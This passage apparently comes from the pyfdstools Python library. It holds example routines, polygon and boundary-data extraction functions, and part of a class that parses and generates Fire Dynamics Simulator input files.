import pyfdstools as fds
import os
from collections import defaultdict
import numpy as np
def exampleImportFile(fdsPath=None):
if fdsPath is None:
systemPath = os.path.dirname(os.path.abspath(__file__))
fdsPath = os.path.join(systemPath, "examples", "case001.fds")
fdsFile = fds.fdsFileOperations()
print("\tStarting to import file from %s"%(fdsPath))
fdsFile.importFile(fdsPath)
print("\tFinished importing file.")
return fdsFile
def exampleSaveFile(file=None, outdir=None, outname=None):
if file is None:
file = exampleImportFile()
if outdir is None:
systemPath = os.path.dirname(os.path.abspath(__file__))
outdir = os.path.join(systemPath, "generated")
if outname is None:
location = os.path.join(outdir, '%s.fds'%(file.head['ID']['CHID']))
print("\tStarting to save model.")
file.saveModel(1, location, allowMeshSplitting=False)
print("\tFinished saving model.")
return location
def exampleErrorCalculation():
data, keys = fds.readErrorTable()
errorvalues = fds.calculatePercentile([100, 200, 300, 400, 500, 600], 'Plume Temperature', 0.95, fdsVersion='6.7.1')
fig, ax1 = fds.plotPercentile(500, 'Plume Temperature', fdsVersion='6.7.1')
return errorvalues
def exampleReadSlcf2dResults(resultDir=None, chid=None,
fdsQuantities = ['TEMPERATURE'],
tStart=0, tEnd=120):
if (resultDir is None) and (chid is None):
systemPath = os.path.dirname(os.path.abspath(__file__))
chid = "case001"
resultDir = os.path.join(systemPath, "examples", "%s.zip"%(chid))
datas = defaultdict(bool)
for qty in fdsQuantities:
grid, data, times = fds.readSLCF2Ddata(chid, resultDir, qty)
tStartInd = np.argwhere(times >= tStart)[0][0]
tEndInd = np.argwhere(times <= tEnd)[-1][0]
data_tavg = np.nanmean(data[:, :, :, tStartInd:tEndInd], axis=3)
datas[qty] = data_tavg.copy()
datas['GRID'] = grid
datas['TIMES'] = times
return datas
def exampleExtract2dFromSlcf2d(datas,
fdsQuantities = ['TEMPERATURE'],
fdsUnits = ['C'],
axis=1, value=2.5,
qnty_mn=20, qnty_mx=150):
datas2D = defaultdict(bool)
for qty, unit in zip(fdsQuantities, fdsUnits):
x, z, data_slc = fds.findSliceLocation(datas['GRID'], datas[qty], axis, value)
datas2D[qty] = data_slc
fig = fds.plotSlice(x, z, data_slc, axis,
qnty_mn=qnty_mn, qnty_mx=qnty_mx,
clabel="%s (%s)"%(qty, unit),
cbarticks=[20, 40, 60, 80, 100, 120, 140])
datas2D['X'] = x
datas2D['Z'] = z
return datas2D, fig
def exampleReadSlcf3dResults(resultDir=None, chid=None,
fdsQuantities = ['TEMPERATURE'],
tStart=0, tEnd=120):
if (resultDir is None) and (chid is None):
systemPath = os.path.dirname(os.path.abspath(__file__))
chid = "case001"
resultDir = os.path.join(systemPath, "examples", "%s.zip"%(chid))
datas = defaultdict(bool)
for qty in fdsQuantities:
grid, data, times = fds.readSLCF3Ddata(chid, resultDir, qty)
tStartInd = np.argwhere(times >= tStart)[0][0]
tEndInd = np.argwhere(times <= tEnd)[-1][0]
data_tavg = np.nanmean(data[:, :, :, tStartInd:tEndInd], axis=3)
datas[qty] = data_tavg.copy()
datas['GRID'] = grid
datas['TIMES'] = times
return datas
def exampleExtract2dFromSlcf3d(datas,
fdsQuantities = ['TEMPERATURE'],
fdsUnits = ['C'],
axis=2, value=4.4,
qnty_mn=20, qnty_mx=150):
datas2D = defaultdict(bool)
for qty, unit in zip(fdsQuantities, fdsUnits):
x, z, data_slc = fds.findSliceLocation(datas['GRID'], datas[qty], axis, value)
datas2D[qty] = data_slc
fig = fds.plotSlice(x, z, data_slc, axis,
qnty_mn=qnty_mn, qnty_mx=qnty_mx,
clabel="%s (%s)"%(qty, unit),
cbarticks=[20, 40, 60, 80, 100, 120, 140])
datas2D['X'] = x
datas2D['Z'] = z
return datas2D, fig
def exampleImportBndf(resultDir=None, chid=None, fdsFile=None,
fdsQuantities = ['WALL TEMPERATURE'],
fdsUnits = ['C'],
tStart=0, tEnd=120,
axis=-2, value=4.4,
qnty_mn=20, qnty_mx=100):
if (resultDir is None) and (chid is None):
systemPath = os.path.dirname(os.path.abspath(__file__))
chid = "case001"
resultDir = os.path.join(systemPath, "examples", "%s.zip"%(chid))
    if fdsFile is None:
        fdsFilePath = fds.getFileList(resultDir, chid, 'fds')[0]
    else:
        fdsFilePath = fdsFile  # assume the caller passed a path to the .fds file
datas, times = fds.queryBndf(resultDir, chid, fdsFilePath, fdsQuantities, fdsUnits, axis, value)
tStartInd = np.argwhere(times >= tStart)[0][0]
tEndInd = np.argwhere(times <= tEnd)[-1][0]
for qty, unit in zip(fdsQuantities, fdsUnits):
for mesh in list(datas[qty].keys()):
data = datas[qty]['DATA']
x = datas[qty]['X']
z = datas[qty]['Z']
meanData = np.mean(data[:, :, tStartInd:tEndInd], axis=2)
fig = fds.plotSlice(x, z, meanData, axis,
qnty_mn=qnty_mn, qnty_mx=qnty_mx,
clabel="%s (%s)"%(qty, unit),
cbarticks=[20, 40, 60, 80, 100, 120, 140])
return datas, fig
def exampleExtractBndfMax(resultDir=None, chid=None, outDir=None,
fdsFile=None, smvFile=None, outputNamespace=None,
fdsQuantities = ['WALL TEMPERATURE'], fdsUnits = ['C'],
tStart=0, tEnd=120, tInt=1, tBand=3, orientations=[0],
axis=-2, value=4.4,
qnty_mn=20, qnty_mx=100,
yticks=[20, 50, 100, 150, 200, 250, 300, 350]):
if (resultDir is None) and (chid is None) and (outDir is None):
systemPath = os.path.dirname(os.path.abspath(__file__))
chid = "case001"
resultDir = os.path.join(systemPath, "examples", "%s.zip"%(chid))
outDir = os.path.join(systemPath, "generated")
    if fdsFile is None:
        fdsFilePath = fds.getFileList(resultDir, chid, 'fds')[0]
    else:
        fdsFilePath = fdsFile  # assume the caller passed a path to the .fds file
    if smvFile is None:
        smvFilePath = fds.getFileList(resultDir, chid, 'smv')[0]
    else:
        smvFilePath = smvFile  # assume the caller passed a path to the .smv file
if outputNamespace is None: outputNamespace = "%s_max_"%(chid)
outputName = os.path.join(outDir, outputNamespace)
datas = fds.extractMaxBndfValues(fdsFilePath, smvFilePath, resultDir, chid, fdsQuantities,
tStart=tStart, tEnd=tEnd, tInt=tInt, tBand=tBand, orientations=orientations)
figs = []
for qty in fdsQuantities:
times = datas[qty]['TIMES']
mPts = datas[qty]['DATA']
names = datas[qty]['NAMES']
outName = "%s%s"%(outputName, qty)
fds.maxValueCSV(times, mPts, names, outName)
fig = fds.maxValuePlot(times, mPts, names, outName, vName=qty, yticks=yticks)
figs.append(fig)
return datas, figs
def example2dSliceToCsv(resultDir=None, outDir=None, chid=None,
quantity=None, unit=None, axis=None, value=None,
time=None, dt=None):
if (resultDir is None) and (chid is None) and (outDir is None):
systemPath = os.path.dirname(os.path.abspath(__file__))
chid = "case001"
resultDir = os.path.join(systemPath, "examples", "%s.zip"%(chid))
outDir = os.path.join(systemPath, "generated")
try:
os.mkdir(outDir)
except:
pass
data = fds.query2dAxisValue(resultDir, chid, quantity, axis, value, time=time, dt=dt)
fds.renderSliceCsvs(data, chid, outDir)
fig, ax = fds.plotSlice(data['x'], data['z'], data['datas'][:, :, -1], axis,
clabel="%s (%s)"%(quantity, unit))
fig.savefig(os.path.join(outDir, '%s_%s_%0.0f_%0.4f_final_frame.png'%(chid, quantity, axis, value)))
return data, fig
def runExamples():
systemPath = os.path.dirname(os.path.abspath(__file__))
exampleInputFdsFile = os.path.join(systemPath, "examples", "case001.fds")
exampleOutputDir = os.path.join(systemPath, "generated")
chid = "case001"
resultDir = os.path.join(systemPath, "examples", "%s.zip"%(chid))
print("Importing model example", flush=True)
file = exampleImportFile(exampleInputFdsFile)
print("Saving model example", flush=True)
exampleSaveFile(file=file, outdir=exampleOutputDir)
print("Plotting error example", flush=True)
exampleErrorCalculation()
print("Importing SLCF2D results example", flush=True)
datas = exampleReadSlcf2dResults(resultDir=resultDir, chid=chid)
print("Extracting slice from SLCF2D results example", flush=True)
datas2D, fig = exampleExtract2dFromSlcf2d(datas)
print("Importing SLCF3D results example", flush=True)
datas = exampleReadSlcf3dResults(resultDir=resultDir, chid=chid)
print("Extracting 2-D slice from SLCF3D results example", flush=True)
datas2D, fig = exampleExtract2dFromSlcf3d(datas)
print("Importing BNDF results example", flush=True)
datas, fig = exampleImportBndf(resultDir=resultDir, chid=chid)
print("Extracting max value from BNDF results example", flush=True)
datas, figs = exampleExtractBndfMax(resultDir=resultDir, chid=chid, outDir=exampleOutputDir)
print("Rendering 2d slice to csv example.", flush=True)
datas = example2dSliceToCsv(resultDir=resultDir, chid=chid, outDir=exampleOutputDir,
axis=1, value=2.45, time=30, dt=60, quantity='TEMPERATURE', unit='C')
if __name__ == '__main__':
runExamples()
```
#### File: johodges/pyfdstools/extractPolygon.py
```python
import numpy as np
import os
from collections import defaultdict
#from . import utilities as ut
from .fdsFileOperations import fdsFileOperations
from .utilities import in_hull, zreadlines, getFileList, pts2polygons
from .extractBoundaryData import linkBndfFileToMesh, loadBNDFdata_lessParams
from .smokeviewParser import parseSMVFile
def extractMaxBndfValues(fdsFilePath, smvFilePath, resultDir, chid, fdsQuantities,
tStart=0, tEnd=120, tInt=1, tBand=3, orientations=[0]):
fdsFile = fdsFileOperations()
fdsFile.importFile(fdsFilePath)
meshes = list(fdsFile.meshes.keys())
names = getPolygonNamesFromFdsFile(fdsFile)
linesSMV = zreadlines(smvFilePath)
points = parseFDSforPts(fdsFile, linesSMV, names, extend=[0,0,0])
polygons, numberOfGroups = pts2polygons(points)
bndfs = getFileList(resultDir, chid, 'bf')
bndf_dic = linkBndfFileToMesh(meshes, bndfs, fdsQuantities)
smvGrids, smvObsts, smvBndfs, smvSurfs = parseSMVFile(smvFilePath)
datas = defaultdict(bool)
for qty in fdsQuantities:
datas[qty] = defaultdict(bool)
times, mPts, orients = loadBNDFdata_lessParams(tStart, tEnd, tInt, tBand, bndf_dic[qty], smvGrids, smvObsts, orientations, polygons)
datas[qty]['TIMES'] = times
datas[qty]['NAMES'] = names
datas[qty]['DATA'] = mPts
return datas
def getPolygonNamesFromFdsFile(file):
names = []
obstList = list(file.obsts.keys())
if 'unknownCounter' in obstList: obstList.remove('unknownCounter')
for key in obstList:
if file.obsts[key]['BNDF_OBST']:
names.append(file.obsts[key]["ID"])
names = list(set(names))
return names
def parseFDSforPts(fileFDS, linesSMV, names, extend=[0,0,0]):
''' This routine parses an FDS file looking for a list of names and
stores a list of points defining polygons for each name which is
found.
The extend argument allows the polygon to be extended by a number of grid
cells. This is useful since FDS snaps obstructions to the grid which means
the actual coordinate location of the data from FDS may not align exactly
with the input file.
'''
smvObjs = []
for i in range(0,len(linesSMV)):
line2 = linesSMV[i]
if "GRID" in line2:
gridPts = [int(x) for x in linesSMV[i+1].replace('\n','').split()]
gridTRNX = np.array([[float(y) for y in x.replace('\n','').split()] for x in linesSMV[i+8:i+9+gridPts[0]]])
gridTRNY = np.array([[float(y) for y in x.replace('\n','').split()] for x in linesSMV[i+12+gridPts[0]:i+13+gridPts[0]+gridPts[1]]])
gridTRNZ = np.array([[float(y) for y in x.replace('\n','').split()] for x in linesSMV[i+16+gridPts[0]+gridPts[1]:i+17+gridPts[0]+gridPts[1]+gridPts[2]]])
dx = (gridTRNX.max()-gridTRNX.min())/(gridTRNX.shape[0]-1)
dy = (gridTRNY.max()-gridTRNY.min())/(gridTRNY.shape[0]-1)
dz = (gridTRNZ.max()-gridTRNZ.min())/(gridTRNZ.shape[0]-1)
if "OBST" in line2 and "HIDE_OBST" not in line2:
try:
numOBST = int(linesSMV[i+1].replace(' ',''))
except:
print(linesSMV[i-2:i+2])
assert False, "Stopped"
tmp1 = linesSMV[i+2:i+2+numOBST]
tmp2 = linesSMV[i+2+numOBST:i+2+numOBST+numOBST]
tmp1 = [x.replace('\n','') for x in tmp1]
tmp2 = [x.replace('\n','') for x in tmp2]
tmp1 = [[float(y) for y in x.split()] for x in tmp1]
tmp2 = [[float(y) for y in x.split()] for x in tmp2]
for i in range(0, len(tmp1)):
if len(tmp2[i]) > 8:
tmp2[i] = tmp2[i][:8]
smvObj = np.array([x1+x2 for x1, x2 in zip(tmp1,tmp2)])
for j in range(0,smvObj.shape[0]):
pts = smvObj[j,13:19]
x1 = gridTRNX[np.where(gridTRNX[:,0] == pts[0])[0][0],1]
x2 = gridTRNX[np.where(gridTRNX[:,0] == pts[1])[0][0],1]
y1 = gridTRNY[np.where(gridTRNY[:,0] == pts[2])[0][0],1]
y2 = gridTRNY[np.where(gridTRNY[:,0] == pts[3])[0][0],1]
z1 = gridTRNZ[np.where(gridTRNZ[:,0] == pts[4])[0][0],1]
z2 = gridTRNZ[np.where(gridTRNZ[:,0] == pts[5])[0][0],1]
newPts = np.array([x1,x2,y1,y2,z1,z2])
if newPts[0] == newPts[1]: newPts[1] = newPts[1] + dx
if newPts[2] == newPts[3]: newPts[3] = newPts[3] + dy
if newPts[4] == newPts[5]: newPts[5] = newPts[5] + dz
#print("Pre-snap:",smvObj[j,:6])
#print("Post-snap:",newPts)
smvObj[j,13:19] = newPts
if len(smvObjs) == 0:
smvObjs = smvObj
else:
smvObjs = np.append(smvObjs,smvObj,axis=0)
obstKeys = list(fileFDS.obsts.keys())
if 'unknownCounter' in obstKeys: obstKeys.remove('unknownCounter')
polygons = []
for name in names:
linkedPolygons = []
for key in obstKeys:
if name in fileFDS.obsts[key]['ID']:
coord = fileFDS.obsts[key]['XB']
snapInd = np.argmin(np.sum(abs(smvObjs[:,:6]-coord)**2,axis=1)**0.5)
snapPts = smvObjs[snapInd,13:19].copy()
pts = [[snapPts[0]-extend[0],snapPts[2]-extend[1],snapPts[4]-extend[2]],
[snapPts[0]-extend[0],snapPts[2]-extend[1],snapPts[5]+extend[2]],
[snapPts[0]-extend[0],snapPts[3]+extend[1],snapPts[4]-extend[2]],
[snapPts[0]-extend[0],snapPts[3]+extend[1],snapPts[5]+extend[2]],
[snapPts[1]+extend[0],snapPts[2]-extend[1],snapPts[4]-extend[2]],
[snapPts[1]+extend[0],snapPts[2]-extend[1],snapPts[5]+extend[2]],
[snapPts[1]+extend[0],snapPts[3]+extend[1],snapPts[4]-extend[2]],
[snapPts[1]+extend[0],snapPts[3]+extend[1],snapPts[5]+extend[2]]]
#print("Before snapping:",coord)
#print("After snapping:",newPts)
linkedPolygons.append(pts)
polygons.append(linkedPolygons)
return polygons
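# Hedged usage sketch for parseFDSforPts, mirroring the call in extractMaxBndfValues
# above; 'case.fds'/'case.smv' and dx, dy, dz are hypothetical placeholders:
#   fdsFile = fdsFileOperations()
#   fdsFile.importFile('case.fds')
#   linesSMV = zreadlines('case.smv')
#   names = getPolygonNamesFromFdsFile(fdsFile)
#   # pad each snapped obstruction by one grid cell in every direction:
#   points = parseFDSforPts(fdsFile, linesSMV, names, extend=[dx, dy, dz])
#   polygons, numberOfGroups = pts2polygons(points)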
def parseFDSforVID(file,vName):
    ''' Returns the index (1-based, counted over &BNDF lines) of the &BNDF entry
    in the FDS input file whose line contains vName.
    '''
with open(file,'r') as f:
lines = f.readlines()
vIDCounter = 0
for line2 in lines:
line = line2.replace('/\n','')
if '&BNDF' in line:
vIDCounter = vIDCounter + 1
if vName in line:
vID = vIDCounter
return vID
def getCoordinateMasks(coords,polygons):
masks = np.zeros((coords.shape[0],len(polygons)))
for i in range(0,len(polygons)):
linkedpolygons = polygons[i]
for p in linkedpolygons:
masks[np.where(in_hull(coords,p.points)),i] = 1
return masks
def getCoordinateMasks2(coords,polygons):
    from . import utilities as ut  # local import; the module-level import is commented out above
    masks = np.zeros((coords.shape[0],len(polygons)))
for i in range(0,len(polygons)):
linkedpolygons = polygons[i]
for p in linkedpolygons:
for j in range(0,coords.shape[0]):
if ut.pnt_in_cvex_hull(p, coords[j,:]):
masks[j,i] = 1
return masks
```
#### File: johodges/pyfdstools/fdsFileOperations.py
```python
import numpy as np
import pandas as pd
from collections import defaultdict
import datetime
import re
import scipy.spatial as scsp
import os
import zipfile
from .fdsTypes import fdsLineTypes
class fdsFileOperations(object):
"""
A class used to represent an FDS input file
...
Attributes
----------
bndfs : defaultdict
dictionary containing each key in the bndf namelist
ctrls : defaultdict
dictionary containing each key in the ctrl namelist
customLines : defaultdict
dictionary containing custom lines to be added to the input file
devcs : defaultdict
dictionary containing each key in the devc namelist
dump : defaultdict
dictionary containing each key in the dump namelist
head : defaultdict
dictionary containing each key in the head namelist
holes : defaultdict
dictionary containing each key in the hole namelist
inits : defaultdict
dictionary containing each key in the init namelist
matls : defaultdict
dictionary containing each key in the matl namelist
meshes : defaultdict
dictionary containing each key in the mesh namelist
meshOrder : defaultdict
dictionary containing the order meshes are to be defined in the
input file. This is an intermediate variable used after
assigning mpi processes to meshes.
misc : defaultdict
dictionary containing each key in the misc namelist
mpiProcesses : int
integer number of mpi processes to use when building the fds
input file.
obsts : defaultdict
dictionary containing each key in the obst namelist
pres : defaultdict
dictionary containing each key in the pres namelist
props : defaultdict
dictionary containing each key in the prop namelist
radis : defaultdict
dictionary containing each key in the radi namelist
ramps : defaultdict
dictionary containing each key in the ramp namelist
reacs : defaultdict
dictionary containing each key in the reac namelist
slcfs : defaultdict
dictionary containing each key in the slcf namelist
specs : defaultdict
dictionary containing each key in the spec namelist
surfs : defaultdict
dictionary containing each key in the surf namelist
time : defaultdict
dictionary containing each key in the time namelist
vents : defaultdict
dictionary containing each key in the vent namelist
version : str
string containing the fds version for the input file.
Syntax is '#.#.#'. Currently supports 6.7.1 and 6.7.4.
zones : defaultdict
dictionary containing each key in the zone namelist
Methods
-------
    addBNDF(QUANTITY, CELL_CENTERED=None)
Adds a bndf key to the bndfs namelist.
addCTRL(ID, FUNCTION_TYPE, INPUT_ID, DELAY=None)
Adds a ctrl key to the ctrls namelist.
addDEVC(ID, QUANTITY, XYZ=None, XB=None, IOR=None, SPEC_ID=None,
TIME_AVERAGED=None, SPATIAL_STATISTIC=None, STATISTICS=None,
INITIAL_STATE=None, INIT_ID=None, SETPOINT=None,
DUCT_ID=None, PROP_ID=None)
Adds a devc key to the devcs namelist.
addDUMP(RENDER_FILE=None, COLUMN_DUMP_LIMIT=False, WRITE_XYZ=False,
DT_PL3D=None, DT_SL3D=None, DT_SLCF=None, DT_BNDF=None,
DT_DEVC=None, DT_CTRL=None, DT_HRR=None, DT_RESTART=None)
Adds a dump key to the dump namelist.
addHEAD(chid, title=None)
Adds a head key to the head namelist.
addHOLE(ID, XB)
Adds a hole key to the holes namelist.
addMATL(ID, Emi=None, Den=None, Con=None, Spe=None, kramp=None,
cpramp=None, fyi=None)
Adds a matl key to the matls namelist.
addMESH(ID, IJK, XB)
Adds a mesh key to the meshes namelist.
addMISC(BNDF_DEFAULT=None, TMPA=None)
Adds a misc key to the misc namelist.
addMPIprocesses(numberOfProcesses, allowMeshSplitting=True,
splitMultiplier=1.20,
meshSplitAxes=[True, True, False])
Adds mpi processes to meshes. Can be used to automatically
split meshes to balance load on mpi processes.
addOBST(ID, XB, SURF_IDS=None, SURF_ID=None, SURF_ID6=None,
BNDF_OBST=True, THICKEN=None, TRANSPARENCY=None, COLOR=None)
Adds obst key to the obsts namelist.
addPRES(VELOCITY_TOLERANCE=None, MAX_PRESSURE_ITERATIONS=None)
Adds pres keys to the pres namelist.
addRAMP(ID, T, F)
Adds ramp keys to the ramps namelist.
addREAC(ID, FUEL=None, FORMULA=None, AIT=None, SY=None, COY=None,
HOC=None, C=None, H=None, O=None, N=None, FYI=None, RF=None)
Adds reac keys to the reacs namelist.
addSLCF(Qty, PBX=None, PBY=None, PBZ=None,
Vec=False, XB=None, SPEC_ID=None)
Adds slcf key to the slcfs namelist.
addSURF(ID, Mid=None, Col=None, Thi=None, Bac=None, Geo=None,
Fyi=None, Len=None, LeaPat=None, Hrrpua=None, qramp=None,
Rgb=None, adiabatic=False, VOLUME_FLOW=None, VEL_T=None)
Adds surf key to the surfs namelist.
addTIME(T_END=0.0, T_BEGIN=0.0)
Adds time key to the times namelist.
addVENT(ID, SURF_ID, XB=None, CTRL_ID=None, MB=None, IOR=None)
Adds vent key to the vents namelist.
addZONE(ID, XB, LEAK_AREA=None)
Adds zone key to the zones namelist.
calculateMeshCells()
Returns a list of mesh keys and number of cells in each mesh.
checkOverlappingMESH()
Returns True if any meshes are overlapping else False
dictFromLine(line, lineType, types)
Returns a dictionary with keys and values from a namelist line.
dictMerge(template, master, path=None)
Returns merged dictionary where keys in master overwrite keys
in template.
generateFDStext()
Returns str of input file.
getDefaultFields()
Returns default field order.
getLineType(line)
Returns namelist key from str line.
getMeshLimits()
Returns a dictionary containing a key 'XB' with an array of the
total extents defined in meshes.
getNewlineFromTypes()
Returns a dictionary containing default new line parameters.
getPolygonNamesFromFdsFile()
Returns a list of polygons defined in the fds input file.
importFile(file=None, text=None, textList=None)
Adds keys to each namelist from an input file, text, or text
list.
interpretKey(key, lineType, types)
Intermediate function which processes a key from a namelist
key pair to returns the keyID, keyType, and keyValue.
keyAssist(text, types, dic, internalKeys=['counter'], newline=False)
Returns a namelist text line based on an input dictionary and
type dictionary.
keyFromLineType(lineType)
Returns internal attribute name from namelist type.
makeFDSLines(textFDS)
Returns a list of namelist lines.
makeLinesFromDict(items, types, prefix, newline=False)
Returns a str generated from a namelist dictionary.
makeMESH(meshes, meshTypes, meshOrder=False)
Returns a str generated from a meshes namelist dictionary.
makeRAMP(ramps)
Returns a str generated from a ramps namelist dictionary.
mergeTypeFromLineType(lineType)
Returns internal merge type based on namelist type.
parseFDSLines(lines)
Adds each line to internal attribute namelist dictionaries.
parseLine(line, lineType, types, key)
Adds one line to the corresponding internal attribute namelist
dictionary.
saveModel(mpiProcesses, location, allowMeshSplitting=True,
splitMultiplier=1.2)
Saves an fds input file based on internal attribute namelist
dictionaries. Allows splitting of meshes to optimize mpi
processes balance.
splitLineIntoKeys(line2)
Returns namelist key pairs from a line.
splitMESHonce(mesh)
Splits a mesh along its largest axis.
zopen(file)
Opens a file or zip archive for reading.
"""
def __init__(self, version="6.7.4"):
"""
Parameters
----------
version : str
string containing the fds version for the input file.
Syntax is '#.#.#'. Currently supports 6.7.1 and 6.7.4.
"""
self.head = defaultdict(bool)
self.devcs = defaultdict(bool)
self.inits = defaultdict(bool)
self.obsts = defaultdict(bool)
self.holes = defaultdict(bool)
self.vents = defaultdict(bool)
self.surfs = defaultdict(bool)
self.ramps = defaultdict(bool)
self.ctrls = defaultdict(bool)
self.meshes = defaultdict(bool)
self.slcfs = defaultdict(bool)
self.bndfs = defaultdict(bool)
self.time = defaultdict(bool)
self.dump = defaultdict(bool)
self.misc = defaultdict(bool)
self.zones = defaultdict(bool)
self.reacs = defaultdict(bool)
self.matls = defaultdict(bool)
self.radis = defaultdict(bool)
self.pres = defaultdict(bool)
self.parts = defaultdict(bool)
self.profs = defaultdict(bool)
self.props = defaultdict(bool)
self.specs = defaultdict(bool)
self.winds = defaultdict(bool)
self.customLines = []
self.devcs['unknownCounter'] = 0
self.obsts['unknownCounter'] = 0
self.holes['unknownCounter'] = 0
self.vents['unknownCounter'] = 0
self.meshes['unknownCounter'] = 0
self.slcfs['unknownCounter'] = 0
self.bndfs['unknownCounter'] = 0
self.profs['unknownCounter'] = 0
self.meshOrder = False
self.version = version
def addBNDF(self, QUANTITY, CELL_CENTERED=None):
"""Adds a bndf key to internal attribute bndfs
        Adds a bndf key to the internal attribute bndfs. Optional parameters
that are specified as None will not be explicitly specified in
a generated input file. These values at runtime will default to
current FDS default parameters.
Parameters
----------
QUANTITY : str
Quantity of the bndf
CELL_CENTERED : bool, optional
Flag specifying if the quantity should be exported at cell
centers or at cell edges (default None).
"""
bndf = defaultdict(bool)
bndf['ID'] = "BNDF-%05.0f"%(self.bndfs['unknownCounter'])
bndf['QUANTITY'] = QUANTITY
if CELL_CENTERED != None: bndf['CELL_CENTERED'] = CELL_CENTERED
self.bndfs['unknownCounter'] += 1
self.bndfs[bndf['ID']] = bndf
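    # e.g. (hedged sketch): fdsFile.addBNDF('WALL TEMPERATURE', CELL_CENTERED=True)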
def addCTRL(self, ID, FUNCTION_TYPE, INPUT_ID, DELAY=None,
CONSTANT=None, RAMP_ID=None):
"""Adds a ctrl key to internal attribute ctrls
        Adds a ctrl key to the internal attribute ctrls. Optional parameters
that are specified as None will not be explicitly specified in
a generated input file. These values at runtime will default to
current FDS default parameters.
Parameters
----------
ID : str
Identifier for this control
FUNCTION_TYPE : str
Identify for type of control.
Valid entries are: ANY, ALL
INPUT_ID : str
Identifier for device or control for logic.
DELAY : float, optional
Time delay for activation of control (default None)
CONSTANT : float, optional
Value for constant defined in input id
RAMP_ID : str, optional
Name of ramp to be used to map control output
"""
ctrl = defaultdict(bool)
ctrl['ID'] = ID
ctrl['FUNCTION_TYPE'] = FUNCTION_TYPE
ctrl['INPUT_ID'] = INPUT_ID
if DELAY != None: ctrl['DELAY'] = DELAY
if CONSTANT != None: ctrl['CONSTANT'] = CONSTANT
if RAMP_ID != None: ctrl['RAMP_ID'] = RAMP_ID
self.ctrls[ID] = ctrl
def addDEVC(self, ID, QUANTITY, XYZ=None, XB=None, IOR=None,
SPEC_ID=None, TIME_AVERAGED=None,
SPATIAL_STATISTIC=None, STATISTICS=None,
INITIAL_STATE=None, INIT_ID=None, SETPOINT=None,
DUCT_ID=None, NO_UPDATE_DEVC_ID=None, CTRL_ID=None,
PROP_ID=None, MATL_ID=None):
"""Adds a devc key to internal attribute devcs
Adds a devc key to internal attribute devcs. Optional parameters
that are specified as None will not be explicitly specified in
a generated input file. These values at runtime will default to
current FDS default parameters.
Parameters
----------
ID : str
Identifier for this device
QUANTITY : str
Quantity of the device
XYZ : float array(3), optional
Three component array containing X, Y, Z coordinates
(default None)
XB : float array(6), optional
Six component array containing X_min, X_max, Y_min, Y_max,
Z_min, Z_max coordinates (default None)
IOR : int, optional
Integer specifying the orientation of the device
(default None)
SPEC_ID : str, optional
String specifying the species of the device (default None)
TIME_AVERAGED : bool, optional
Flag specifying if the device is time averaged
(default None)
SPATIAL_STATISTIC : str, optional
String specifying spatial statistic of the device
(default None)
STATISTICS : str, optional
String specifying statistic type
INITIAL_STATE : bool, optional
Flag specifying if device is initially active (default None)
INIT_ID : str, optional
String specifying init namelist identifier
SETPOINT : float, optional
Flag value used to determine activation of device
(default None)
DUCT_ID : str, optional
String identifier of duct containing device
NO_UPDATE_DEVC_ID : str, optional
String identifier of device activation to stop updating
CTRL_ID : str, optional
String identifier of control for device
PROP_ID : str, optional
String identifier of properties for device
MATL_ID : str, optional
String identifier for material properties for device
"""
devc = defaultdict(bool)
devc['ID'] = ID
devc['QUANTITY'] = QUANTITY
if XYZ is not None:
if type(XYZ) is list: XYZ = np.array(XYZ)
devc['XYZ'] = XYZ
if XB is not None:
if type(XB) is list: XB = np.array(XB)
devc['XB'] = XB
if INITIAL_STATE != None: devc['INITIAL_STATE'] = INITIAL_STATE
if INIT_ID != None: devc['INIT_ID'] = INIT_ID
if SETPOINT != None: devc['SETPOINT'] = SETPOINT
if IOR != None: devc['IOR'] = IOR
if TIME_AVERAGED != None: devc['TIME_AVERAGED'] = TIME_AVERAGED
if SPATIAL_STATISTIC != None:
devc['SPATIAL_STATISTIC'] = SPATIAL_STATISTIC
if STATISTICS != None: devc["STATISTICS"] = STATISTICS
if DUCT_ID != None: devc['DUCT_ID'] = DUCT_ID
if SPEC_ID != None: devc['SPEC_ID'] = SPEC_ID
if NO_UPDATE_DEVC_ID != None: devc['NO_UPDATE_DEVC_ID'] = NO_UPDATE_DEVC_ID
if CTRL_ID != None: devc['CTRL_ID'] = CTRL_ID
if PROP_ID != None: devc['PROP_ID'] = PROP_ID
if MATL_ID != None: devc['MATL_ID'] = MATL_ID
self.devcs[ID] = devc
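# Usage sketch (hypothetical; assumes an instance `fds = fdsFileOperations()`
# of this class, with instance and quantity names chosen for illustration):
#     fds.addDEVC('TC-01', 'THERMOCOUPLE', XYZ=[0.5, 0.5, 1.8])
#     fds.addDEVC('TRIGGER-01', 'TEMPERATURE', XYZ=[0.5, 0.5, 2.3], SETPOINT=74.0)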
def addDUMP(self, RENDER_FILE=None, COLUMN_DUMP_LIMIT=False,
WRITE_XYZ=False, DT_PL3D=None, DT_SL3D=None,
DT_SLCF=None, DT_BNDF=None, DT_DEVC=None, DT_CTRL=None,
DT_HRR=None, DT_RESTART=None):
"""Adds a dump key to internal attribute dumps
Adds a dump key to internal attribute dumps. Optional parameters
that are specified as None will not be explicitly specified in
a generated input file. These values at runtime will default to
current FDS default parameters.
Parameters
----------
RENDER_FILE : str, optional
Filename for render file (default None)
COLUMN_DUMP_LIMIT : bool, optional
Flag specifying if number of columns in CSV file should be
limited (default False)
WRITE_XYZ : bool, optional
Flag specifying if an XYZ file should be generated by FDS
(default False)
DT_PL3D : float, optional
Time interval to output PL3D data (default None)
DT_SL3D : float, optional
Time interval to output SL3D data (default None)
DT_SLCF : float, optional
Time interval to output SLCF data (default None)
DT_BNDF : float, optional
Time interval to output BNDF data (default None)
DT_DEVC : float, optional
Time interval to output DEVC data (default None)
DT_CTRL : float, optional
Time interval to output CTRL data (default None)
DT_HRR : float, optional
Time interval to output HRR data (default None)
DT_RESTART : float, optional
Time interval to save restart files (default None)
"""
dump = defaultdict(bool)
if RENDER_FILE != None: dump['RENDER_FILE'] = RENDER_FILE
if COLUMN_DUMP_LIMIT:
dump['COLUMN_DUMP_LIMIT'] = COLUMN_DUMP_LIMIT
if WRITE_XYZ: dump['WRITE_XYZ'] = WRITE_XYZ
if DT_PL3D != None: dump['DT_PL3D'] = DT_PL3D
if DT_SL3D != None: dump['DT_SL3D'] = DT_SL3D
if DT_SLCF != None: dump['DT_SLCF'] = DT_SLCF
if DT_BNDF != None: dump['DT_BNDF'] = DT_BNDF
if DT_DEVC != None: dump['DT_DEVC'] = DT_DEVC
if DT_CTRL != None: dump['DT_CTRL'] = DT_CTRL
if DT_HRR != None: dump['DT_HRR'] = DT_HRR
